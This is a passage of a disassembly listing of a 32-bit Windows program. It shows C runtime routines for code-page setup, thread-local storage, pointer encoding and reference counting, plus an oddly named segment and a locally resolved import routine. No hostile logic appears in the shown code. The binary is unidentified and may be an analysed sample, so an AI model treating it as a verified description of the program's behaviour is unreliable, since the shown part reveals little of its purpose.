sub_404DEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404DF4 proc near ; CODE XREF: sub_404E6E+19p
; sub_405019+25p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_402AEB
cmp esi, 0FFFFFFFEh
mov dword_427924, ebx
jnz short loc_404E2F
mov dword_427924, 1
call ds:off_41D184
loc_404E21: ; CODE XREF: sub_404DF4+50j
; sub_404DF4+67j
cmp [ebp+var_4], bl
jz short loc_404E6B
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_404E6B
; ---------------------------------------------------------------------------
loc_404E2F: ; CODE XREF: sub_404DF4+1Bj
cmp esi, 0FFFFFFFDh
jnz short loc_404E46
mov dword_427924, 1
call ds:dword_41D188 ; GetACP
jmp short loc_404E21
; ---------------------------------------------------------------------------
loc_404E46: ; CODE XREF: sub_404DF4+3Ej
cmp esi, 0FFFFFFFCh
jnz short loc_404E5D
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov dword_427924, 1
jmp short loc_404E21
; ---------------------------------------------------------------------------
loc_404E5D: ; CODE XREF: sub_404DF4+55j
cmp [ebp+var_4], bl
jz short loc_404E69
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_404E69: ; CODE XREF: sub_404DF4+6Cj
mov eax, esi
loc_404E6B: ; CODE XREF: sub_404DF4+30j
; sub_404DF4+39j
pop ebx
leave
retn
sub_404DF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E6E proc near ; CODE XREF: sub_405019+5Ep
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_404DF4
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_404EA5
loc_404E97: ; CODE XREF: sub_404E6E+193j
mov eax, ebx
call sub_404B71
loc_404E9E: ; CODE XREF: sub_404E6E+146j
xor eax, eax
jmp loc_40500A
; ---------------------------------------------------------------------------
loc_404EA5: ; CODE XREF: sub_404E6E+27j
mov [ebp+var_1C], esi
xor eax, eax
loc_404EAA: ; CODE XREF: sub_404E6E+4Fj
cmp dword_4234A0[eax], edi
jz short loc_404F19
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_404EAA
lea eax, [ebp+var_18]
push eax
push edi
call ds:dword_41D1B4 ; GetCPInfo
test eax, eax
jz loc_404FFB
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407F20
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_404FEE
cmp [ebp+var_12], 0
jz loc_404FCF
lea esi, [ebp+var_11]
loc_404F03: ; CODE XREF: sub_404E6E+15Bj
mov cl, [esi]
test cl, cl
jz loc_404FCF
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_404FBF
; ---------------------------------------------------------------------------
loc_404F19: ; CODE XREF: sub_404E6E+42j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407F20
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_4234B0[ecx]
mov [ebp+var_1C], esi
jmp short loc_404F69
; ---------------------------------------------------------------------------
loc_404F3F: ; CODE XREF: sub_404E6E+FEj
mov al, [esi+1]
test al, al
jz short loc_404F6E
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_404F60
; ---------------------------------------------------------------------------
loc_404F4E: ; CODE XREF: sub_404E6E+F4j
mov eax, [ebp+var_20]
mov al, byte_42349C[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_404F60: ; CODE XREF: sub_404E6E+DEj
cmp edi, eax
jbe short loc_404F4E
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_404F69: ; CODE XREF: sub_404E6E+CFj
; sub_404E6E+110j
cmp byte ptr [esi], 0
jnz short loc_404F3F
loc_404F6E: ; CODE XREF: sub_404E6E+D6j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_404F69
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_404B42
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_4234A4[ecx]
pop edx
loc_404FA0: ; CODE XREF: sub_404E6E+13Dj
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_404FA0
loc_404FAD: ; CODE XREF: sub_404E6E+18Bj
mov esi, ebx
call sub_404BC6
jmp loc_404E9E
; ---------------------------------------------------------------------------
loc_404FB9: ; CODE XREF: sub_404E6E+153j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_404FBF: ; CODE XREF: sub_404E6E+A6j
cmp eax, ecx
jbe short loc_404FB9
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_404F03
loc_404FCF: ; CODE XREF: sub_404E6E+8Cj
; sub_404E6E+99j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_404FD7: ; CODE XREF: sub_404E6E+16Ej
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_404FD7
mov eax, [ebx+4]
call sub_404B42
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_404FF1
; ---------------------------------------------------------------------------
loc_404FEE: ; CODE XREF: sub_404E6E+82j
mov [ebx+8], esi
loc_404FF1: ; CODE XREF: sub_404E6E+17Ej
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_404FAD
; ---------------------------------------------------------------------------
loc_404FFB: ; CODE XREF: sub_404E6E+5Ej
cmp dword_427924, esi
jnz loc_404E97
or eax, 0FFFFFFFFh
loc_40500A: ; CODE XREF: sub_404E6E+32j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_404E6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405019 proc near ; CODE XREF: sub_4051B3+Bp
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00405185 SIZE 0000002E BYTES
push 14h
push offset dword_421790
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_40574D
mov edi, eax
mov [ebp+var_24], edi
call sub_404D50
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_404DF4
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_4051A6
push 220h
call sub_407AEA
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_4051AA
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_404E6E
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_405185
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call ds:dword_41D18C ; InterlockedDecrement
test eax, eax
jnz short loc_4050AA
mov eax, [esi+68h]
cmp eax, offset dword_423070
jz short loc_4050AA
push eax
call sub_4039CF
pop ecx
loc_4050AA: ; CODE XREF: sub_405019+7Ej
; sub_405019+88j
mov [esi+68h], ebx
push ebx
mov edi, ds:dword_41D1B8
call edi ; InterlockedIncrement
test byte ptr [esi+70h], 2
jnz loc_4051AA
test byte ptr dword_423594, 1
jnz loc_4051AA
push 0Dh
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov dword_427934, eax
mov eax, [ebx+8]
mov dword_427938, eax
mov eax, [ebx+0Ch]
mov dword_42793C, eax
xor eax, eax
loc_4050F3: ; CODE XREF: sub_405019+F0j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_40510B
mov cx, [ebx+eax*2+10h]
mov word_427928[eax*2], cx
inc eax
jmp short loc_4050F3
; ---------------------------------------------------------------------------
loc_40510B: ; CODE XREF: sub_405019+E0j
xor eax, eax
loc_40510D: ; CODE XREF: sub_405019+109j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_405124
mov cl, [eax+ebx+1Ch]
mov byte_423290[eax], cl
inc eax
jmp short loc_40510D
; ---------------------------------------------------------------------------
loc_405124: ; CODE XREF: sub_405019+FCj
xor eax, eax
loc_405126: ; CODE XREF: sub_405019+125j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_405140
mov cl, [eax+ebx+11Dh]
mov byte_423398[eax], cl
inc eax
jmp short loc_405126
; ---------------------------------------------------------------------------
loc_405140: ; CODE XREF: sub_405019+115j
push dword_423498
call ds:dword_41D18C ; InterlockedDecrement
test eax, eax
jnz short loc_405163
mov eax, dword_423498
cmp eax, offset dword_423070
jz short loc_405163
push eax
call sub_4039CF
pop ecx
loc_405163: ; CODE XREF: sub_405019+135j
; sub_405019+141j
mov dword_423498, ebx
push ebx
call edi ; InterlockedIncrement
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40517A
jmp short loc_4051AA
sub_405019 endp
; =============== S U B R O U T I N E =======================================
sub_40517A proc near ; CODE XREF: sub_405019+15Ap
; DATA XREF: fabskl8p:004217A8o
push 0Dh
call sub_405CCF
pop ecx
retn
sub_40517A endp
; ---------------------------------------------------------------------------
jmp short loc_4051AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_405019
loc_405185: ; CODE XREF: sub_405019+6Aj
cmp eax, 0FFFFFFFFh
jnz short loc_4051AA
cmp ebx, offset dword_423070
jz short loc_405199
push ebx
call sub_4039CF
pop ecx
loc_405199: ; CODE XREF: sub_405019+177j
call sub_405B83
mov dword ptr [eax], 16h
jmp short loc_4051AA
; ---------------------------------------------------------------------------
loc_4051A6: ; CODE XREF: sub_405019+30j
and [ebp+var_20], 0
loc_4051AA: ; CODE XREF: sub_405019+45j
; sub_405019+A1j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_405019
; =============== S U B R O U T I N E =======================================
sub_4051B3 proc near ; CODE XREF: sub_40AF33+Cp
; sub_40AF90+Dp ...
cmp dword_436954, 0
jnz short loc_4051CE
push 0FFFFFFFDh
call sub_405019
pop ecx
mov dword_436954, 1
loc_4051CE: ; CODE XREF: sub_4051B3+7j
xor eax, eax
retn
sub_4051B3 endp
; =============== S U B R O U T I N E =======================================
sub_4051D1 proc near ; CODE XREF: sub_405423+31p
; sub_405765+E8p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_405254
cmp eax, offset off_423F38
jz short loc_405254
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_405254
cmp [eax], ebp
jnz short loc_405254
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_40521B
cmp [eax], ebp
jnz short loc_40521B
push eax
call sub_4039CF
push dword ptr [esi+0BCh]
call sub_40CAB4
pop ecx
pop ecx
loc_40521B: ; CODE XREF: sub_4051D1+31j
; sub_4051D1+35j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_40523C
cmp [eax], ebp
jnz short loc_40523C
push eax
call sub_4039CF
push dword ptr [esi+0BCh]
call sub_40CA74
pop ecx
pop ecx
loc_40523C: ; CODE XREF: sub_4051D1+52j
; sub_4051D1+56j
push dword ptr [esi+0B0h]
call sub_4039CF
push dword ptr [esi+0BCh]
call sub_4039CF
pop ecx
pop ecx
loc_405254: ; CODE XREF: sub_4051D1+12j
; sub_4051D1+19j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_4052A2
cmp [eax], ebp
jnz short loc_4052A2
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_4039CF
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_4039CF
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_4039CF
push dword ptr [esi+0C0h]
call sub_4039CF
add esp, 10h
loc_4052A2: ; CODE XREF: sub_4051D1+8Bj
; sub_4051D1+8Fj
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_423E78
jz short loc_4052C8
cmp [eax+0B4h], ebp
jnz short loc_4052C8
push eax
call sub_40C8E4
push dword ptr [edi]
call sub_4039CF
pop ecx
pop ecx
loc_4052C8: ; CODE XREF: sub_4051D1+DEj
; sub_4051D1+E6j
push 6
lea edi, [esi+50h]
pop ebx
loc_4052CE: ; CODE XREF: sub_4051D1+132j
cmp dword ptr [edi-8], offset dword_423598
jz short loc_4052E8
mov eax, [edi]
cmp eax, ebp
jz short loc_4052E8
cmp [eax], ebp
jnz short loc_4052E8
push eax
call sub_4039CF
pop ecx
loc_4052E8: ; CODE XREF: sub_4051D1+104j
; sub_4051D1+10Aj ...
cmp [edi-4], ebp
jz short loc_4052FF
mov eax, [edi+4]
cmp eax, ebp
jz short loc_4052FF
cmp [eax], ebp
jnz short loc_4052FF
push eax
call sub_4039CF
pop ecx
loc_4052FF: ; CODE XREF: sub_4051D1+11Aj
; sub_4051D1+121j ...
add edi, 10h
dec ebx
jnz short loc_4052CE
push esi
call sub_4039CF
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4051D1 endp
; =============== S U B R O U T I N E =======================================
sub_405311 proc near ; CODE XREF: sub_405423+12p
; sub_405616+93p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, ds:dword_41D1B8
push esi
call edi ; InterlockedIncrement
mov eax, [esi+0B0h]
test eax, eax
jz short loc_40532F
push eax
call edi ; InterlockedIncrement
loc_40532F: ; CODE XREF: sub_405311+19j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_40533C
push eax
call edi ; InterlockedIncrement
loc_40533C: ; CODE XREF: sub_405311+26j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_405349
push eax
call edi ; InterlockedIncrement
loc_405349: ; CODE XREF: sub_405311+33j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_405356
push eax
call edi ; InterlockedIncrement
loc_405356: ; CODE XREF: sub_405311+40j
push 6
lea ebx, [esi+50h]
pop ebp
loc_40535C: ; CODE XREF: sub_405311+71j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_40536E
mov eax, [ebx]
test eax, eax
jz short loc_40536E
push eax
call edi ; InterlockedIncrement
loc_40536E: ; CODE XREF: sub_405311+52j
; sub_405311+58j
cmp dword ptr [ebx-4], 0
jz short loc_40537E
mov eax, [ebx+4]
test eax, eax
jz short loc_40537E
push eax
call edi ; InterlockedIncrement
loc_40537E: ; CODE XREF: sub_405311+61j
; sub_405311+68j
add ebx, 10h
dec ebp
jnz short loc_40535C
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; InterlockedIncrement
pop edi
pop esi
pop ebp
pop ebx
retn
sub_405311 endp
; =============== S U B R O U T I N E =======================================
sub_405397 proc near ; CODE XREF: sub_405423+1Dp
; sub_405765+CCp
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40541F
push ebx
push ebp
push edi
mov edi, ds:dword_41D18C
push esi
call edi ; InterlockedDecrement
mov eax, [esi+0B0h]
test eax, eax
jz short loc_4053B9
push eax
call edi ; InterlockedDecrement
loc_4053B9: ; CODE XREF: sub_405397+1Dj
mov eax, [esi+0B8h]
test eax, eax
jz short loc_4053C6
push eax
call edi ; InterlockedDecrement
loc_4053C6: ; CODE XREF: sub_405397+2Aj
mov eax, [esi+0B4h]
test eax, eax
jz short loc_4053D3
push eax
call edi ; InterlockedDecrement
loc_4053D3: ; CODE XREF: sub_405397+37j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_4053E0
push eax
call edi ; InterlockedDecrement
loc_4053E0: ; CODE XREF: sub_405397+44j
push 6
lea ebx, [esi+50h]
pop ebp
loc_4053E6: ; CODE XREF: sub_405397+75j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_4053F8
mov eax, [ebx]
test eax, eax
jz short loc_4053F8
push eax
call edi ; InterlockedDecrement
loc_4053F8: ; CODE XREF: sub_405397+56j
; sub_405397+5Cj
cmp dword ptr [ebx-4], 0
jz short loc_405408
mov eax, [ebx+4]
test eax, eax
jz short loc_405408
push eax
call edi ; InterlockedDecrement
loc_405408: ; CODE XREF: sub_405397+65j
; sub_405397+6Cj
add ebx, 10h
dec ebp
jnz short loc_4053E6
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi ; InterlockedDecrement
pop edi
pop ebp
pop ebx
loc_40541F: ; CODE XREF: sub_405397+7j
mov eax, esi
pop esi
retn
sub_405397 endp
; =============== S U B R O U T I N E =======================================
sub_405423 proc near ; CODE XREF: sub_405461+54p
test edi, edi
jz short loc_40545E
test eax, eax
jz short loc_40545E
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_40545A
push edi
mov [eax], edi
call sub_405311
test esi, esi
pop ecx
jz short loc_40545A
push esi
call sub_405397
cmp dword ptr [esi], 0
pop ecx
jnz short loc_40545A
cmp esi, offset dword_4235A0
jz short loc_40545A
push esi
call sub_4051D1
pop ecx
loc_40545A: ; CODE XREF: sub_405423+Dj
; sub_405423+1Aj ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40545E: ; CODE XREF: sub_405423+2j
; sub_405423+6j
xor eax, eax
retn
sub_405423 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405461 proc near ; CODE XREF: sub_402AEB+37p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_4217B0
call __SEH_prolog4
call sub_40574D
mov esi, eax
mov eax, dword_423594
test [esi+70h], eax
jz short loc_4054A0
cmp dword ptr [esi+6Ch], 0
jz short loc_4054A0
call sub_40574D
mov esi, [eax+6Ch]
loc_40548C: ; CODE XREF: sub_405461+68j
test esi, esi
jnz short loc_405498
push 20h
call sub_407C0D
pop ecx
loc_405498: ; CODE XREF: sub_405461+2Dj
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4054A0: ; CODE XREF: sub_405461+1Bj
; sub_405461+21j
push 0Ch
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, off_423678
call sub_405423
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054CB
jmp short loc_40548C
sub_405461 endp
; =============== S U B R O U T I N E =======================================
sub_4054CB proc near ; CODE XREF: sub_405461+63p
push 0Ch
call sub_405CCF
pop ecx
mov esi, [ebp-1Ch]
retn
sub_4054CB endp
; =============== S U B R O U T I N E =======================================
sub_4054D7 proc near ; CODE XREF: sub_4030D5+81p
; sub_4030D5+96p ...
arg_0 = dword ptr 4
push esi
push dword_42368C
mov esi, ds:dword_41D180
call esi ; TlsGetValue
test eax, eax
jz short loc_40550B
mov eax, dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_40550B
push eax
push dword_42368C
call esi ; TlsGetValue
call eax
test eax, eax
jz short loc_40550B
mov eax, [eax+1F8h]
jmp short loc_405526
; ---------------------------------------------------------------------------
loc_40550B: ; CODE XREF: sub_4054D7+11j
; sub_4054D7+1Bj ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E0 ; GetModuleHandleA
test eax, eax
jz short loc_405534
push offset aEncodepointer ; "EncodePointer"
push eax
call ds:off_41D0E8
loc_405526: ; CODE XREF: sub_4054D7+32j
test eax, eax
jz short loc_405534
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_405534: ; CODE XREF: sub_4054D7+41j
; sub_4054D7+51j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_4054D7 endp
; =============== S U B R O U T I N E =======================================
sub_40553A proc near ; CODE XREF: sub_407EC9+1p
; sub_40BCC4+2Fp ...
push 0
call sub_4054D7
pop ecx
retn
sub_40553A endp
; =============== S U B R O U T I N E =======================================
sub_405543 proc near ; CODE XREF: sub_4030D5+Bp
; sub_4030D5+1Cp ...
arg_0 = dword ptr 4
push esi
push dword_42368C
mov esi, ds:dword_41D180
call esi ; TlsGetValue
test eax, eax
jz short loc_405577
mov eax, dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_405577
push eax
push dword_42368C
call esi ; TlsGetValue
call eax
test eax, eax
jz short loc_405577
mov eax, [eax+1FCh]
jmp short loc_405592
; ---------------------------------------------------------------------------
loc_405577: ; CODE XREF: sub_405543+11j
; sub_405543+1Bj ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E0 ; GetModuleHandleA
test eax, eax
jz short loc_4055A0
push offset aDecodepointer ; "DecodePointer"
push eax
call ds:off_41D0E8
loc_405592: ; CODE XREF: sub_405543+32j
test eax, eax
jz short loc_4055A0
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4055A0: ; CODE XREF: sub_405543+41j
; sub_405543+51j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405543 endp
; =============== S U B R O U T I N E =======================================
sub_4055A6 proc near ; DATA XREF: sub_405886+8Ao
; .data:off_427964o
call ds:dword_41D17C ; TlsAlloc
retn 4
sub_4055A6 endp
; =============== S U B R O U T I N E =======================================
sub_4055AF proc near ; CODE XREF: sub_4056CA+Ap
push dword_42368C
call ds:dword_41D180 ; TlsGetValue
test eax, eax
jnz short locret_4055D8
push off_427968
call sub_405543
pop ecx
push eax
push dword_42368C
call ds:dword_41D178 ; TlsSetValue
locret_4055D8: ; CODE XREF: sub_4055AF+Ej
retn
sub_4055AF endp
; =============== S U B R O U T I N E =======================================
sub_4055D9 proc near ; CODE XREF: sub_405886+12p
; sub_405886:loc_405A00p
mov eax, dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_4055F9
push eax
push dword_427970
call sub_405543
pop ecx
call eax
or dword_423688, 0FFFFFFFFh
loc_4055F9: ; CODE XREF: sub_4055D9+8j
mov eax, dword_42368C
cmp eax, 0FFFFFFFFh
jz short loc_405611
push eax
call ds:off_41D174
or dword_42368C, 0FFFFFFFFh
loc_405611: ; CODE XREF: sub_4055D9+28j
jmp sub_405C7A
sub_4055D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405616 proc near ; CODE XREF: sub_4056CA+59p
; sub_405886+162p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_4217D0
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E0 ; GetModuleHandleA
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_423DC0
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_405668
push offset aEncodepointer ; "EncodePointer"
push eax
mov ebx, ds:off_41D0E8
call ebx ; sub_446320
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx ; sub_446320
mov [esi+1FCh], eax
loc_405668: ; CODE XREF: sub_405616+2Cj
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_423070
mov [esi+68h], eax
push eax
call ds:dword_41D1B8 ; InterlockedIncrement
push 0Ch
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_4056A6
mov eax, off_423678
mov [esi+6Ch], eax
loc_4056A6: ; CODE XREF: sub_405616+86j
push dword ptr [esi+6Ch]
call sub_405311
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4056C1
call __SEH_epilog4
retn
sub_405616 endp
; =============== S U B R O U T I N E =======================================
sub_4056C1 proc near ; CODE XREF: sub_405616+A0p
; DATA XREF: fabskl8p:004217E8o
push 0Ch
call sub_405CCF
pop ecx
retn
sub_4056C1 endp
; =============== S U B R O U T I N E =======================================
sub_4056CA proc near ; CODE XREF: sub_40574D+1p sub_405B83p ...
push esi
push edi
call ds:dword_41D0EC ; RtlGetLastWin32Error
mov edi, eax
call sub_4055AF
push dword_423688
push dword_42368C
call ds:dword_41D180 ; TlsGetValue
call eax
mov esi, eax
test esi, esi
jnz short loc_405741
push 214h
push 1
call sub_407B2A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405741
push esi
push dword_423688
push off_42796C
call sub_405543
pop ecx
call eax
test eax, eax
jz short loc_405738
push 0
push esi
call sub_405616
pop ecx
pop ecx
call ds:dword_41D0DC ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_405741
; ---------------------------------------------------------------------------
loc_405738: ; CODE XREF: sub_4056CA+54j
push esi
call sub_4039CF
pop ecx
xor esi, esi
loc_405741: ; CODE XREF: sub_4056CA+27j
; sub_4056CA+3Bj ...
push edi
call ds:dword_41D170 ; RtlRestoreLastWin32Error
pop edi
mov eax, esi
pop esi
retn
sub_4056CA endp
; =============== S U B R O U T I N E =======================================
sub_40574D proc near ; CODE XREF: sub_402AEB+Fp sub_403722p ...
push esi
call sub_4056CA
mov esi, eax
test esi, esi
jnz short loc_405761
push 10h
call sub_407C0D
pop ecx
loc_405761: ; CODE XREF: sub_40574D+Aj
mov eax, esi
pop esi
retn
sub_40574D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405765 proc near ; DATA XREF: sub_405886+115o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_4217F0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_405866
mov eax, [esi+24h]
test eax, eax
jz short loc_40578A
push eax
call sub_4039CF
pop ecx
loc_40578A: ; CODE XREF: sub_405765+1Cj
mov eax, [esi+2Ch]
test eax, eax
jz short loc_405798
push eax
call sub_4039CF
pop ecx
loc_405798: ; CODE XREF: sub_405765+2Aj
mov eax, [esi+34h]
test eax, eax
jz short loc_4057A6
push eax
call sub_4039CF
pop ecx
loc_4057A6: ; CODE XREF: sub_405765+38j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_4057B4
push eax
call sub_4039CF
pop ecx
loc_4057B4: ; CODE XREF: sub_405765+46j
mov eax, [esi+44h]
test eax, eax
jz short loc_4057C2
push eax
call sub_4039CF
pop ecx
loc_4057C2: ; CODE XREF: sub_405765+54j
mov eax, [esi+48h]
test eax, eax
jz short loc_4057D0
push eax
call sub_4039CF
pop ecx
loc_4057D0: ; CODE XREF: sub_405765+62j
mov eax, [esi+5Ch]
cmp eax, offset dword_423DC0
jz short loc_4057E1
push eax
call sub_4039CF
pop ecx
loc_4057E1: ; CODE XREF: sub_405765+73j
push 0Dh
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_40580E
push edi
call ds:dword_41D18C ; InterlockedDecrement
test eax, eax
jnz short loc_40580E
cmp edi, offset dword_423070
jz short loc_40580E
push edi
call sub_4039CF
pop ecx
loc_40580E: ; CODE XREF: sub_405765+8Dj
; sub_405765+98j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405871
push 0Ch
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_405853
push edi
call sub_405397
pop ecx
cmp edi, off_423678
jz short loc_405853
cmp edi, offset dword_4235A0
jz short loc_405853
cmp dword ptr [edi], 0
jnz short loc_405853
push edi
call sub_4051D1
pop ecx
loc_405853: ; CODE XREF: sub_405765+C9j
; sub_405765+D8j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40587D
push esi
call sub_4039CF
pop ecx
loc_405866: ; CODE XREF: sub_405765+11j
call __SEH_epilog4
retn 4
sub_405765 endp
; =============== S U B R O U T I N E =======================================
sub_40586E proc near ; DATA XREF: fabskl8p:00421808o
mov esi, [ebp+8]
sub_40586E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405871 proc near ; CODE XREF: sub_405765+B0p
push 0Dh
call sub_405CCF
pop ecx
retn
sub_405871 endp
; =============== S U B R O U T I N E =======================================
sub_40587A proc near ; DATA XREF: fabskl8p:00421814o
mov esi, [ebp+8]
sub_40587A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40587D proc near ; CODE XREF: sub_405765+F5p
push 0Ch
call sub_405CCF
pop ecx
retn
sub_40587D endp
; =============== S U B R O U T I N E =======================================
sub_405886 proc near ; CODE XREF: sub_4044D2:loc_4043D5p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E0 ; GetModuleHandleA
mov edi, eax
test edi, edi
jnz short loc_4058A1
call sub_4055D9
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4058A1: ; CODE XREF: sub_405886+10j
push esi
mov esi, ds:off_41D0E8
push offset dword_41D4E4
push edi
call esi ; sub_446320
